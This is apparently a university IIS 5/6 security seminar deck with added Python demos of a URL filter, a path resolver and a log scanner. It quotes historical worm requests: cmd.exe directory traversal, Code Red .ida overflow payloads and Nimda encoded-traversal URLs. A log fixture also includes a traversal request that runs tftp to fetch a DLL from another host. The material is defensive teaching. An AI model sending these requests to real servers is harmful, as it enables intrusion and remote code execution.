IIS Security - PowerPoint PPT Presentation

1
IIS Security
  • Laurie Walters
  • lxm30@psu.edu
  • Security Operations and Services
  • A Unit of Information Technology Services

2
Note
  • PowerPoint slides for this and other seminars, links to utilities,
    patches, and suggestions for securing Windows operating systems and
    applications can be found at
    http://www.personal.psu.edu/lxm30/windows/windows.html

3
IIS Security Seminar Objectives
  • IIS 5 Security
  • Securing Server and Creating Web Data
  • Installation of IIS 5
  • IIS 5 Management
  • Backing Up IIS Configuration files
  • Securing IIS manually and with IIS Lockdown tool
  • IIS 6 Installation and Security
  • Authentication
  • FTP and SMTP
  • Logging
  • Common IIS Breaches and how to prevent them

4
Secure Your System Before Installing IIS
  • Install IIS on a standalone server, NOT on a domain controller or
    other application server
  • Format drives using NTFS instead of FAT (FAT has no file permissions
    at all)
  • Make sure ALL accounts have good passwords (this includes OS accounts
    and application accounts)
  • Install all OS patches
  • Install application patches
  • Apply appropriate security policies for the local machine (see the
    XP II seminar notes for some suggested guidelines), including
    auditing.

5
Creating Data for IIS
  • Do not place data in the default IIS directory (C:\Inetpub\wwwroot)
  • If possible, store data on a different partition than your OS
  • Check the permissions on the data to make sure that Everyone does not
    have Full Control (on Windows 2000 the NTFS default is for Everyone
    to have Full Control).

6
Demonstration of Appropriate Permissions for Web
Data
  • Navigate to the data folder and right click on it
  • Ensure that Administrators and SYSTEM have Full Control and that the
    Everyone group does not.
  • If the Everyone group has Full Control, remove that group.
  • Add Authenticated Users and grant the appropriate permissions (Read
    for static content; do not grant Write or Full Control to web users)
  • Demonstration of appropriate permissions

8
Installing IIS 5
  • The IIS patch must be applied before the machine is networked!
  • http://support.microsoft.com/default.aspx?scid=kb;en-us;811114
  • It is better to install IIS after the operating system has been
    secured than while initially setting up the OS.
  • Add / Remove Programs → Add / Remove Windows Components

9
IIS 5 Installation
  • By default, the following are installed
  • Common Files
  • Documentation
  • FrontPage 2000 Server Extensions
  • IIS Snap-In
  • SMTP Service
  • WWW Service
  • WWWAdmin service (the HTML Internet Services Manager)
  • Do not install Documentation on a production web server.
  • If you are not using form-mail scripts, do not install the SMTP
    service.

10
IIS 5 Installation
  • The following are not installed by default
  • FTP Service
  • Scripts virtual directory
  • Do not install these unless absolutely necessary

11
IIS 5 Installation
  • Adds the Internet Information Services snap-in (ISM) and the server
    extensions administrator snap-in to Administrative Tools.
  • Adds accounts
  • IUSR_MACHINENAME: built-in account for anonymous IIS access
  • IWAM_MACHINENAME: built-in account used to launch out-of-process
    (isolated) web applications

12
Uninstallation of IIS 5
  • The following are not removed by uninstalling:
  • C:\Inetpub
  • %systemroot%\Help\iishelp
  • %systemroot%\system32\inetsrv
  • The following users are not removed:
  • IUSR_Machinename
  • IWAM_Machinename
  • Delete these folders and accounts by hand if IIS is not going back
    on the machine.

14
Managing IIS 5
  • After IIS is installed, you can access it one of
    two ways
  • Internet Service Manager (ISM)
  • HTML ISM

15
Internet Service Manager
  • Can be accessed through
  • Start → Settings → Control Panel → Administrative Tools → Internet
    Services Manager
  • You can create an ISM shortcut on your desktop by right clicking on
    the ISM icon and clicking Create Shortcut, then dragging that
    shortcut to the desktop.

16
HTML ISM
  • Web-page version of the ISM that can be used to manage IIS remotely
    (not necessarily recommended!)
  • Accessed through the following URL:
  • http://localhost:XXX/IISAdmin/iis.asp
  • Where XXX is the TCP port number of your Administration Web Site.
  • Anonymous access to this site is not enabled by default, and the
    Administration Web Site only accepts connections from 127.0.0.1
    unless you change its IP address restrictions. If you open it up
    for remote access, you will need a Windows administrator username
    and password.

17
Finding the Port Number of the Administration Web Site
  • Open the normal ISM through the Control Panel.
  • Right click on Administration Web Site
  • Choose Properties
  • The Web Site tab will appear by default. On this tab, at the top,
    under Web Site Identification, is TCP Port followed by a number in
    the box. This is your XXX port.
  • You can change this random port to anything you'd like (an obscure
    port is not a security control by itself; keep the IP restriction
    in place).

19
Backing Up IIS Metabase
  • The IIS Metabase is similar to the Windows registry: it stores the
    configuration entries for IIS.
  • IIS 5 keeps it in memory and writes it to disk at
  • C:\WINNT\System32\Inetsrv\Metabase.bin
  • The Metabase can become corrupted, so back it up every time a change
    is made to IIS.
  • You cannot easily restore IIS 5 Metabase info to another computer
    (the backup is tied to the machine it was made on).
  • http://support.microsoft.com/?kbid=301386

20
Backing Up IIS Metabase
  • To back up the Metabase, in the ISM, right click on your server icon
    and select Backup/Restore Configuration.
  • Click Create Backup and enter a meaningful name.
  • The backup is written under %systemroot%\System32\Inetsrv\MetaBack
    on the same machine, so copy it to your normal backup media as well.

22
Ways to Overcome Common IIS Breaches Other Than
Patching
  • Patching only fixes vulnerabilities that are already known; it does
    nothing against the next one.

23
Other means than patching help secure against
future vulnerabilities
  • Always install IIS on NTFS formatted drives
  • Install IIS (and your web data) on a separate hard drive or
    partition from the operating system
  • Do not allow Everyone or the IUSR account to run .exe files (e.g.
    cmd.exe)
  • Use the URLScan and IIS Lockdown tools
  • Follow the suggested SOS (Security Operations and Services)
    guidelines for securing the OS and IIS

24
IIS Lockdown Tool
  • http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/Tools/locktool.asp
  • Turns off unnecessary services and features of IIS (script mappings,
    sample sites, WebDAV, etc.) according to the server role you pick.

25
URLScan
  • Part of the IIS Lockdown tool. It is an ISAPI filter that turns off
    unneeded features and restricts the type of HTTP requests the server
    will process.
  • Execute the following command to extract the Lockdown files without
    running the wizard:
  • iislockd.exe /q /c /t:c:\lockdown_files
  • This extracts urlscan.exe to that folder.
  • Run urlscan.exe to install the filter (it places urlscan.dll and
    urlscan.ini under %systemroot%\system32\inetsrv\urlscan).

26
What can be filtered with URLScan
  • Request method (verb), e.g. GET, HEAD, POST, etc.
  • File extension of the resource requested
  • Suspicious URL encoding (e.g. a URL that still changes when decoded
    a second time)
  • Presence of non-ASCII (high-bit) characters in the URL
  • Presence of specified character sequences in the URL
  • Presence of specified headers in the request

27
Additional abilities of URLScan 2.5
  • Ability to change the log file directory
  • Ability to log long URLs
  • Ability to restrict the size of requests
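
As an added example (not from the slides and not Microsoft's URLScan code), the following Python request filter applies the same kinds of rules URLScan reads from urlscan.ini, so you can see which rule stops which request and why the order of the checks matters. The policy values, the check order and the sample requests are assumptions for this demo, not a copy of any shipped urlscan.ini.

```python
"""Added example, not from the slides and not Microsoft's URLScan: a request
filter that applies the same kinds of rules urlscan.ini expresses, so you
can see which rule rejects which request."""
from urllib.parse import unquote

# Illustrative policy, modelled on the urlscan.ini sections named in the
# comments. The lists are chosen for this demo, not URLScan's defaults.
POLICY = {
    "allow_verbs": {"GET", "HEAD", "POST"},                   # [AllowVerbs]
    "deny_extensions": {".ida", ".idq", ".htw", ".htr", ".printer", ".idc",
                        ".stm", ".shtm", ".shtml", ".exe", ".bat", ".cmd",
                        ".com"},                              # [DenyExtensions]
    "deny_url_sequences": ["..", "./", "\\", ":", "%", "&"],  # [DenyUrlSequences]
    "deny_headers": {"translate:", "if:", "lock-token:"},     # [DenyHeaders]
    "allow_high_bit": False,        # AllowHighBitCharacters=0
    "normalize_before_scan": True,  # NormalizeUrlBeforeScan=1
    "verify_normalization": True,   # VerifyNormalization=1
    "max_url": 260,                 # MaxUrl under [RequestLimits]
}


def check_request(method, url, headers, policy=POLICY):
    """Return None if the request passes, otherwise a string naming the
    first rule that rejected it. Only the path part of the URL is scanned
    for sequences and extensions (an assumption of this demo); the length
    limit applies to the whole URL."""
    if method.upper() not in policy["allow_verbs"]:
        return "verb not allowed: " + method
    if len(url) > policy["max_url"]:
        return "url too long"
    path = url.split("?", 1)[0]
    scanned = unquote(path) if policy["normalize_before_scan"] else path
    # A URL that still changes when decoded a second time was
    # double-encoded: %255c -> %5c -> '\' is the classic case.
    if policy["verify_normalization"] and unquote(scanned) != scanned:
        return "url changes on second normalization"
    if not policy["allow_high_bit"] and any(ord(c) > 0x7f for c in scanned):
        return "high-bit character in url"
    for seq in policy["deny_url_sequences"]:
        if seq in scanned:
            return "denied sequence: " + seq
    last = scanned.rsplit("/", 1)[-1]
    dot = last.rfind(".")
    if dot != -1 and last[dot:].lower() in policy["deny_extensions"]:
        return "denied extension: " + last[dot:].lower()
    for name in headers:
        if name.lower() + ":" in policy["deny_headers"]:
            return "denied header: " + name
    return None


if __name__ == "__main__":
    # Constructed requests shaped like the ones discussed in the seminar.
    samples = [
        ("GET", "/files/the%20name%20of%20the%20file.txt", {"Host": "www.iistestbox.com"}),
        ("GET", "/scripts/..%255c../winnt/system32/cmd.exe", {}),
        ("GET", "/scripts/..%5c../winnt/system32/cmd.exe", {}),
        ("GET", "/scripts/..%c1%1c../winnt/system32/cmd.exe", {}),
        ("GET", "/default.ida?NNNN%u9090", {}),
        ("PROPFIND", "/", {}),
        ("GET", "/index.htm", {"Translate": "f"}),
    ]
    for method, url, headers in samples:
        print(check_request(method, url, headers) or "allowed", "<-", method, url)
```

Because the normalization check runs before the sequence and extension checks, a double-encoded request is rejected even though the raw path contains neither ".." nor a denied extension, which is exactly the gap the worms on the later slides exploited.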

28
Securing IIS 5 Manually
  • Change permissions on vital files, e.g.
  • cacls %systemroot%\*.exe /T /G System:F Administrators:F
  • (cacls /G without /E replaces the existing ACL, so Everyone and the
    IUSR account lose access to those executables; test this on a
    non-production box first.)
  • Also change the permissions on command.com
  • Do not use the Default Web Site: create a new web site
  • Stop or delete the Administration Web Site
  • Remove the IIS samples and documentation
  • Keep all static content separate from scripts, executables, etc.
  • Remove unnecessary script mappings

29
Make sure you have the correct version of MDAC
  • MDAC (Microsoft Data Access Components) provides the underlying
    functionality for database operations, like connecting to remote
    databases and returning data to a client.
  • Versions 2.6 and lower have a heap overflow vulnerability (in the
    RDS component that IIS exposes).
  • If you do not need RDS, remove the MSADC virtual directory from your
    web server.

30
Removing Unnecessary Script Mappings
  • .ida, .idq, .htw: Index Services
  • .htr: web-based Windows password reset
  • .printer: Internet Printing Protocol
  • .stm, .shtm, .shtml: server-side includes
  • .idc: Internet Database Connector applications

31
Disabling Parent Paths
  • Parent Paths (the "Enable parent paths" option on the App Options
    tab) allow ASP code to use relative file path names that climb out
    of the current folder (../directory/file.html instead of
    C:\directory\file.html).
  • The problem with Parent Paths is that they can be exploited to move
    back up the file structure to the root of C:\,
  • from where one can traverse to known file locations that are
  • more permissive (e.g. C:\Inetpub\scripts) or
  • contain goodies (e.g. C:\WINNT\system32)

32
You can disable parent paths and still use
relative pathnames
  • Note: it is possible to use relative pathnames with some effort
  • (e.g. if your IIS data folder is in a different folder than your
    database and you don't want to use absolute pathnames for
    everything).
  • You have to write a little code that puts the absolute pathname in
    a variable (for example from Server.MapPath) and builds the
    relative pathnames from it.
  • http://www.windowswebsolutions.com/Articles/Index.cfm?ArticleID=23278

35
IIS 6 Installation
  • By default, the following are installed
  • Common Files
  • Documentation
  • IIS Snap-In
  • WWW Service
  • FrontPage (Office) Server Extensions and ASP.NET are installed only
    if you check those options
  • Do not install Documentation on a production web server.
  • If you are not using form-mail scripts, do not install the SMTP
    service.

36
IIS 6 Installation
  • The following are not installed by default
  • FTP Service
  • Scripts virtual directory
  • Do not install these unless absolutely necessary

37
IIS 6 Installation
  • Installed by Manage Your Server in Start → Administrative Tools
  • Choose Add or Remove a Role
  • Choose Application Server
  • Follow the prompts, and choose whether to install ASP.NET and the
    FrontPage Server Extensions

38
IIS 6 Installation
  • Adds the Internet Information Services (IIS) Manager snap-in (ISM)
    and the server extensions administrator snap-in to Administrative
    Tools.
  • Adds accounts
  • IUSR_MACHINENAME: built-in account for anonymous IIS access
  • IWAM_MACHINENAME: built-in account used to launch out-of-process
    applications (IIS 5 isolation mode)
  • Note that IIS 6 worker processes themselves run as Network Service
    by default, not as SYSTEM, and the IIS_WPG group is created for
    worker process identities.

39
Uninstallation of IIS 6
  • The following are not removed by uninstalling:
  • C:\Inetpub
  • %systemroot%\Help\iishelp
  • %systemroot%\system32\inetsrv
  • The following users are not removed:
  • IUSR_Machinename
  • IWAM_Machinename
  • Delete these folders and accounts by hand if IIS is not going back
    on the machine.

40
Installing IIS 6
  • With IIS 6, you have to actually turn on the features you'd like to
    use
  • Under the ISM, click on Web Service Extensions
  • Features currently installed in IIS will be listed on the right hand
    side
  • All Unknown ISAPI Extensions
  • All Unknown CGI Extensions
  • Active Server Pages
  • FrontPage Server Extensions 2002 (only if you installed them)
  • Internet Data Connector
  • Server Side Includes
  • WebDAV
  • All are Prohibited until you click Allow. Leave the two "All
    Unknown" entries prohibited and add only the specific web service
    extensions you need.

41
Demonstrations
  • IIS Lockdown Tool for IIS 5
  • Manually securing IIS 5
  • Manually securing IIS 6

43
IIS Authentication
  • To set the means of IIS authentication, right click on your web site
    and select Properties, then choose the Directory Security tab. Click
    the Edit button next to Anonymous access and authentication control.
  • Anonymous: uses IUSR_Machinename to access the site anonymously
  • Integrated Windows: users connect to the machine with a Windows
    username and password; the password itself is not sent over the
    wire (NTLM challenge/response, or Kerberos in a Windows 2000 domain)
  • Basic: authenticates to the machine using a username/password that
    is only base64-encoded, i.e. effectively in the clear, so use it
    only over SSL. Basic user accounts must have the "log on locally"
    right.
  • Digest: within a Windows 2000 domain, a hash of the password is sent
    and compared against what the domain controller holds; this
    requires the accounts to store passwords with reversible
    encryption.
  • Kerberos: with Integrated Windows authentication, IIS 5 negotiates
    Kerberos v5 when client, server and account are in a Windows 2000
    domain, and falls back to NTLM otherwise.

45
FTP and SMTP
  • Disable SMTP and FTP if not needed; if absolutely needed, limit
    access by userid/password or IP address.
  • Use other means than FTP if possible (WebDAV over SSL, Terminal
    Services, etc.): FTP sends usernames, passwords and data in the
    clear.
  • Allowing totally anonymous connections to the machine is a bad idea.
  • Specify the directory where users can upload/download files.
  • Set appropriate permissions on files in this directory (e.g. remote
    users can read but not write or execute files).

47
IIS Logging
  • Enable extended logging properties in the IIS Manager
  • Choose W3C Extended Log File Format in the Active log format
    drop-down
  • Make sure Date, Time, Server IP, Client IP, URI Stem and URI Query
    are checked (User Agent and Referer are also useful when tracing an
    attack)
  • Daily logs are kept, with timestamps in UTC (GMT), in the following
    location: %systemroot%\System32\LogFiles\W3SVC1\ex020930.log
    (ex + yymmdd)
  • Check the box Use local time for file naming and rollover so that
    files are named and rolled over at local midnight (EST/EDT) instead
    of GMT. The entries inside a W3C extended log stay in GMT; only the
    file naming and rollover follow local time.

49
Common IIS Breaches
  • Buffer overflows (XXXXXXXXXXXXXXX<code>)
  • Directory traversal (../../../c:/winnt/system32/cmd.exe)
  • Canonicalization
  • Requesting an unusual action using cmd.exe or .bat files
  • Requests encoded using an alternate character set (e.g. Unicode) or
    including character sequences that are rarely seen in legitimate
    requests.
  • All of the above were used by recent worms (e.g. sadmind/IIS, Code
    Red, Code Red II, Nimda)

50
Buffer Overflows
  • Programs don't check input for appropriate length.
  • Input beyond the maximum length overwrites adjacent memory on the
    stack, including the saved return address of the current function.
  • Attackers must carefully craft the overflow so that they know where
    their input lands on the stack and the overwritten return address
    points back into it, so that the CPU executes the arbitrary input.

51
Problem with Buffer Overflows in IIS
  • The IIS 5 process (inetinfo.exe) runs in the context of the SYSTEM
    account.
  • When a buffer overflow is leveraged against IIS 5, arbitrary
    commands can be run in the context of the SYSTEM user.
  • (IIS 6 worker processes run as Network Service by default, which
    limits what an overflow in them can do; the vulnerable ISAPI
    extension still has to be unmapped or patched.)

52
Canonicalization
  • Various file names are equivalent
  • E.g. c:\directory\file.html, file.html and ..\..\file.html may all
    refer to the same file
  • When some non-static file types are requested via a malformed URL,
    IIS locates the correct file but gets the actual location of the
    file wrong, because it makes its security decision on the
    un-canonicalized name.
  • Since it decides the file is in a different folder than it actually
    is, it applies the wrong permissions.

53
Problem with Canonicalization
  • A file in a folder with restricted permissions is requested, but the
    permissions applied are those of the file's ancestor folders rather
    than the actual file permissions.
  • If the parent's permissions are less restrictive, the attacker gets
    extra privileges on the file.

54
Directory Traversal (Dot Dot Slash)
  • IIS fails to canonicalize the URL before checking that it stays
    inside the web root, and inadequate NTFS ACLs on the directory or
    files in question then let the request reach them.
  • http://www.iistestbox.com/../../../../../winnt/system32/cmd.exe

55
Examples of Unicode and Hex Encoding URLs
  • Unicode example: Arabic letters
  • Hexadecimal examples (%xx, the hex value of the ASCII character)
  • Space %20
  • Plus %2B
  • Period %2E
  • / %2F
  • Colon %3A
  • ? %3F
  • \ %5C
  • % %25

56
Hexadecimal use
  • Good use of hexadecimal
  • http://www.iistestbox.com/files/the%20name%20of%20the%20file.txt
  • Bad use of hexadecimal
  • http://www.iistestbox.com/..%2F..%2Fwinnt/file.txt
  • Double decoding of hex
  • Unpatched IIS 5 decoded HTTP requests that traverse executable
    directories twice: once before the security check and again before
    mapping the path to disk (fixed in MS01-026)
  • %255c
  • 1st decode: %5c
  • 2nd decode: \
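
The following Python is an added example, not from the slides: a string-level simulation of how a URL under a virtual directory is mapped to a physical path. It shows why decoding again after the traversal check (the double-decode flaw above) lets a request escape the web root, and how a resolver that decodes once, rejects anything non-canonical and checks the final path against the root stops it, which is also the fix for the parent-path, canonicalization and dot-dot-slash slides. The /scripts layout is a made-up stand-in for C:\Inetpub\scripts and nothing here touches the disk.

```python
"""Added example, not from the original slides: simulate IIS path mapping
to show the double-decode escape and a resolver that blocks it."""
import posixpath
from urllib.parse import unquote, unquote_to_bytes

VDIR = "/scripts"                    # virtual directory (assumed)
VDIR_PHYSICAL = "/inetpub/scripts"   # stands in for C:\Inetpub\scripts


def map_to_disk(decoded_path):
    """Map a decoded URL path under VDIR to a physical path, treating '\\'
    like '/' as Windows does and collapsing '..' the way the file system
    would. Pure string work; nothing is opened."""
    rel = decoded_path[len(VDIR):].replace("\\", "/")
    return posixpath.normpath(VDIR_PHYSICAL + "/" + rel.lstrip("/"))


def resolve_double_decode(url):
    """The flawed order of unpatched IIS 5 (MS01-026): decode once, run the
    traversal check on that form, then decode again before mapping."""
    once = unquote(url)
    if "../" in once or "..\\" in once:
        raise PermissionError("traversal rejected")
    twice = unquote(once)            # the %5c left by pass one becomes '\'
    return map_to_disk(twice)


def resolve_safe(url):
    """Decode exactly once (strict UTF-8, so overlong forms such as %c0%af
    are refused), reject residual encoding, backslashes and NULs, then
    verify the final physical path is still under the virtual directory."""
    try:
        once = unquote_to_bytes(url).decode("utf-8")
    except UnicodeDecodeError:
        raise PermissionError("invalid UTF-8 in URL") from None
    if "%" in once or "\\" in once or "\x00" in once:
        raise PermissionError("residual encoding, backslash or NUL")
    if not once.startswith(VDIR + "/"):
        raise PermissionError("outside virtual directory")
    physical = map_to_disk(once)
    if posixpath.commonpath([physical, VDIR_PHYSICAL]) != VDIR_PHYSICAL:
        raise PermissionError("escapes virtual directory")
    return physical


def is_allowed(url, resolver=resolve_safe):
    """True if the resolver maps the URL without rejecting it."""
    try:
        resolver(url)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    # Constructed requests shaped like the ones on the slides.
    for url in ["/scripts/sub/the%20file.asp",
                "/scripts/../../winnt/system32/cmd.exe",
                "/scripts/..%5c..%5cwinnt/system32/cmd.exe",
                "/scripts/..%255c..%255cwinnt/system32/cmd.exe",
                "/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe"]:
        for name, resolver in [("double-decode", resolve_double_decode),
                               ("safe", resolve_safe)]:
            try:
                print(f"{name:13} {url} -> {resolver(url)}")
            except PermissionError as err:
                print(f"{name:13} {url} -> rejected ({err})")
```

The double-decoded request passes the flawed resolver's check and maps to /winnt/system32/cmd.exe, while the safe resolver rejects it on the residual "%" before any mapping happens; the final commonpath check is what catches a plain ../ climb even when the other checks are bypassed.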

57
IIS Sadmind Worm
  • GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 - 2001-05-06
    12:20:19 10.10.10.10 - 10.20.20.20 80
  • GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
    2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80
  • GET /scripts/../../winnt/system32/cmd.exe
    /c+copy+\winnt\system32\cmd.exe+root.exe 502 - 2001-05-06 12:20:19
    10.10.10.10 - 10.20.20.20 80
  • GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp
    502 -

58
Effects of sadmind/IIS
  • The sadmind/IIS worm exploited a vulnerability in Solaris systems:
    the Solaris worm created a root shell on the infected host and
    automatically attacked other vulnerable Solaris systems.
  • It subsequently installed software to attack and deface Microsoft
    IIS web servers

59
Ways to Protect Against sadmind/IIS
  • Microsoft patch MS00-078 (Web Server Folder Traversal), which fixes
    the canonicalization flaw the worm uses
  • Disable Parent Paths
  • Restrict access to cmd.exe so that it can't be used by the worm

60
.printer Buffer Overflow (jill.c)
  • .printer: web-based control of networked printers (Internet Printing
    Protocol, handled by the msw3prt.dll ISAPI extension)
  • GET /NULL.printer HTTP/1.0
  • Host: <420-character buffer>
  • Instead of simply crashing, IIS 5 is automatically restarted by
    Windows 2000, so the attack can go unnoticed
  • Jill exploits the .printer B.O. vulnerability to create a remote
    shell, where the attacker can enter any command at the following
    prompt:
  • C:\WINNT\System32>

61
Ways to protect against the Jill B.O.
  • Microsoft patch MS01-023
  • If not using IPP:
  • Unmap the .printer application mapping in IIS so that the extension
    DLL is not loaded at IIS startup.
  • Or delete the file C:\WINNT\System32\msw3prt.dll, which is the
    actual file that the .printer extension points to.

62
.ida/.idq Buffer Overflow
  • .ida (Internet Data Administration) provides support for Index
    Server administrative scripts,
  • .idq (Internet Data Query) provides support for internet data
    queries (Indexing Services)
  • Both are handled by idq.dll; the B.O. works by sending an overly
    long value in an .ida request to idq.dll
  • GET /null.ida?<240-character buffer of X's> HTTP/1.1
  • The IIS process is halted before the request even reaches the Index
    service, and IIS restarts

63
Code Red 1 Worm (Another .ida/.idq worm)
  • /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3
    %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000
    %u00=a
  • (224 N's to fill the buffer, followed by the %uXXXX-encoded payload
    on one line)

64
Effects of Code Red 1
  • A machine infected with Code Red 1 scans random IP addresses on port
    80/TCP looking for other hosts to infect.
  • Code Red 1 lives only in memory (when the machine reboots, the worm
    is gone and no longer performs scans, but an unpatched machine is
    re-infected as soon as it is hit again).
  • Web pages on Code Red 1-infected machines may be defaced with the
    following message:
  • HELLO! Welcome to http://www.worm.com! Hacked By Chinese!

65
Ways to Protect Against Code Red 1
  • Microsoft cumulative patch MS02-062 (original patch MS01-033)
  • If not using Indexing Services, remove the application mapping for
    .ida and .idq
  • Install URLScan and deny any request containing "%" in the URL (it
    is in the default [DenyUrlSequences] list, and .ida/.idq are in the
    default [DenyExtensions] list), so the %u-encoded payload is
    rejected before it reaches idq.dll

66
Code Red 2
  • GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3
    %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000
    %u00=a
  • (224 X's instead of Code Red 1's N's, same %uXXXX payload, on one
    line)

67
Effects of Code Red 2
  • After a successful .ida/.idq B.O., CR2 creates threads that scan for
    new hosts to infect for the next 24 hours.
  • Unlike Code Red I, CR2 is not only memory-resident: it leaves files
    on disk.
  • CR2 copies cmd.exe to the file root.exe in the publicly accessible
    IIS scripts and MSADC folders (an intruder may then execute
    arbitrary commands with the privileges of the IIS server process).

68
CR2 Contains a Backdoor Trojan
  • A Trojan horse copy of explorer.exe is created by CR2 and copied to
    C:\ and D:\.
  • The Trojan horse explorer.exe calls the real explorer.exe to mask
    its existence, and creates virtual directory mappings that expose
    the C and D drives through the web server.
  • On systems not patched against the "Relative Shell Path"
    vulnerability, this Trojan horse copy of explorer.exe will run
    every time a user logs in.

69
Ways to Protect Against CR2
  • Microsoft cumulative patch MS02-062
  • If not using Indexing Services, remove the application mapping for
    .ida and .idq
  • Install URLScan and deny any request containing "%" in the URL
  • Restrict access to cmd.exe so that it can't be used by the worm
  • Protect against the "Relative Shell Path" vulnerability: Microsoft
    patch MS00-052
  • Remove any root.exe and Trojan explorer.exe the worm already left
    behind; patching alone does not clean them up

70
Nimda Worm
  • Nimda is sent as an e-mail attachment
  • that pretends to have an "audio/x-wav" content-type
  • (it is really an executable file).
  • If executed, it infects the host, causing various files to be
    replaced with infected copies.
  • The worm sends itself out by e-mail, searches for open network
    shares, attempts to copy itself to un-patched or vulnerable
    Microsoft IIS web servers, and is a virus infecting both local files
    and files on remote network shares.

71
Nimda
  • GET /scripts/root.exe?/c+dir
  • GET /MSADC/root.exe?/c+dir
  • GET /c/winnt/system32/cmd.exe?/c+dir
  • GET /d/winnt/system32/cmd.exe?/c+dir
  • GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
  • GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
  • GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
  • GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
  • GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
  • GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
  • GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
  • GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
  • GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
  • GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
  • GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
  • GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
  • Note: the first four entries in these sample logs denote attempts
    to connect to the backdoor left by Code Red II (root.exe and the C
    and D drive mappings), while the remaining log entries are examples
    of exploit attempts for the directory traversal vulnerability (\xNN
    is the hex value of a raw byte in the request).
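
As an added example (not part of the slides), the Python below parses IIS W3C extended log lines by their #Fields directive, decodes the URI the way unpatched IIS would (up to twice, to unwrap %255c), and flags the request shapes shown in the sadmind/IIS excerpt and the Nimda list above, which is how you would check the logs the logging slide tells you to keep. The log excerpt is constructed for this demo, using the field set that slide recommends; the tag names and thresholds are assumptions.

```python
"""Added example, not from the original slides: parse W3C extended logs
and flag traversal, backdoor, tftp-fetch and .ida overflow requests."""
import re
from urllib.parse import unquote

# Constructed sample in W3C extended format (not a real capture). Lines
# 2-5 mirror Code Red II / Nimda probes, line 6 a Code Red .ida request.
SAMPLE_LOG = r"""
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-09-18 13:00:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 13:00:01 10.10.10.10 - 10.20.20.20 80 GET /default.htm - 200
2001-09-18 13:00:02 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+dir 200
2001-09-18 13:00:03 10.10.10.10 - 10.20.20.20 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:00:04 10.10.10.11 - 10.20.20.20 80 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:00:05 10.10.10.11 - 10.20.20.20 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2010.10.10.11%20GET%20Admin.dll%20d:\Admin.dll 200
2001-09-18 13:00:06 10.10.10.12 - 10.20.20.20 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 200
2001-09-18 13:00:07 10.10.10.13 - 10.20.20.20 80 GET /files/the%20name%20of%20the%20file.txt - 200
"""

SHELLS = {"cmd.exe", "root.exe"}
# '..' followed by a control or non-ASCII character: what the Unicode and
# overlong-UTF-8 traversal forms look like once decoded.
MALFORMED_DOTDOT = re.compile(r"\.\.[^\x20-\x7e]")


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in #Fields."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            raise ValueError("field count mismatch: " + line)
        yield dict(zip(fields, values))


def decode_url(s, rounds=2):
    """Percent-decode up to `rounds` times, stopping when nothing changes.
    Two rounds reproduce what unpatched IIS 5 did and unwrap %255c."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def escapes_root(path):
    """True if walking the path's segments ever climbs above the root."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def classify(rec):
    """Return the list of suspicious traits seen in one log record."""
    stem = decode_url(rec["cs-uri-stem"])
    query = decode_url(rec["cs-uri-query"])
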